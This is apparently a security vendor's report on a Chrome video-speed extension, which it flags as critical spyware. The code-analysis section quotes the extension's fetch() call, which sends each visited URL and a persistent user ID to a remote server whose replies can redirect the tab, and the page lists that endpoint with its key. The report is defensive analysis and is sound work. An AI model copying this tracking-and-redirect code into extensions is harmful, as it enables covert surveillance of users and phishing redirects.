Spyware Activity
Flags items that secretly collect user or device information without authorization.
critical
Analysis summary
Video Speed Controller - Video manager is a Google Chrome extension that allows users to adjust video playback speed on various streaming platforms. It is rated Critical risk due to confirmed malicious behavior and involvement in a known campaign.
Key insights:
- Intended for adjusting video playback speed on platforms like Netflix and YouTube.
- Rated Critical due to confirmed malicious behavior and campaign involvement.
- Exhibits behavior consistent with malicious campaigns, posing significant security threats.
- Potentially misuses access to manipulate browser activity beyond its declared function.
- Poses a critical risk to privacy and browser integrity, impacting organizational security posture.
Malware versions
1.0.12
Now Viewing
malware
1.0.11
malware
1.0.10
malware
Findings
Associated with Malicious Campaign
Flags items that have been linked to known malicious campaigns based on threat intelligence or prior incidents. Indicates coordinated activity with intent to compromise, deceive, or exploit users.
critical
Malicious Activity Detected
Flags items that exhibit confirmed malicious activity.
critical
Evidence
While appearing functional, this extension hijacks the browser by intercepting tab updates, exfiltrating visited URLs to a threat actor’s command-and-control server, and redirecting users to phishing or malware sites. This behavior enables persistent surveillance, credential theft, and full account compromise.
All findings are available for Enterprise users
Code analysis
AI-powered analysis of the extension's source code for security insights and risk assessment.
This Chrome extension is designed to control the playback speed of HTML5 videos via context menu options. It creates a context menu on video elements with options to increase, decrease, or reset the playback speed, and communicates these actions to content scripts via message passing.
Key behaviors:
- Context Menu Creation: Adds a context menu for video elements with speed control options.
- Tab Update Listener: Listens for tab updates and, if a new URL is detected, makes a POST request to
https://click.videocontrolls.com/api?...with a unique user ID and the outgoing URL as parameters. If the response is a valid HTTP URL, it may redirect the current tab or open a new tab to that URL, depending on thekeepTabsetting. - Unique User ID: Generates and stores a UUID in local storage to identify the user across sessions.
Network Activity:
- Sends data about visited URLs to a remote server (
click.videocontrolls.com) on every tab update. The server response can cause the extension to redirect the user's tab to a new URL.
fetch("https://click.videocontrolls.com/api?key=...&uuid="+a+"&allowempty=1&out="+encodeURIComponent(r.url)+"&format=txt&r="+Math.random(), c)
Potential Concerns:
- The extension sends every visited URL to a third-party server and can redirect users based on the server's response. This behavior is not required for video speed control functionality and could be used for tracking, ad injection, or phishing.
- The code is not heavily obfuscated, but the network activity and redirection logic are strong indicators of potentially unwanted or malicious behavior.
No filesystem or process execution activity was observed.
Permissions
medium
storage
api
Enables persistent data storage for the extension, potentially storing large amounts of user-related information.
low
contextMenus
api
Allows adding items to browser context menus, potentially intercepting user right-click interactions.
low
https://*/*
host
API Calls
API calls detected through static analysis of the source code. For more accurate insights, explore our sandbox dynamic analysis.
high
Enterprise Only
Enterprise Only
Enterprise Only
medium
Enterprise Only
Enterprise Only
Enterprise Only
low
Enterprise Only
Enterprise Only
Enterprise Only
API CALLS ARE AVAILABLE FOR ENTERPRISE USERS
Secrets
Any encoded/decoded secrets we managed to find in the source code, git repository, or related files
high
Enterprise Only
Enterprise Only
Enterprise Only
medium
Enterprise Only
Enterprise Only
Enterprise Only
low
Enterprise Only
Enterprise Only
Enterprise Only
SECRETS ARE AVAILABLE FOR ENTERPRISE USERS
Vulnerabilities
Known vulnerabilities and security issues detected in the extension's dependencies and code.
high
Enterprise Only
Enterprise Only
Enterprise Only
medium
Enterprise Only
Enterprise Only
Enterprise Only
low
Enterprise Only
Enterprise Only
Enterprise Only
VULNERABILITIES ARE AVAILABLE FOR ENTERPRISE USERS
External communication
Any identifiers we detected that may indicate external communication from the item's code
https://chrome.google.com/webstore/detail/$
javascript/popup.js
https://click.videocontrolls.com/api?key=c7d9f00d27e4ba72a6c1f12c94a17aa13ac46712&uuid=
javascript/worker.js
All external communications are available for Enterprise users
Dependencies
Dependencies and third-party libraries used by the extension, including version information and license details.
high
Enterprise Only
Enterprise Only
Enterprise Only
medium
Enterprise Only
Enterprise Only
Enterprise Only
low
Enterprise Only
Enterprise Only
Enterprise Only
DEPENDENCIES ARE AVAILABLE FOR ENTERPRISE USERS
Licenses & Compliance
high
Enterprise Only
Enterprise Only
Enterprise Only
medium
Enterprise Only
Enterprise Only
Enterprise Only
low
Enterprise Only
Enterprise Only
Enterprise Only
LICENSES & COMPLIANCE ARE AVAILABLE FOR ENTERPRISE USERS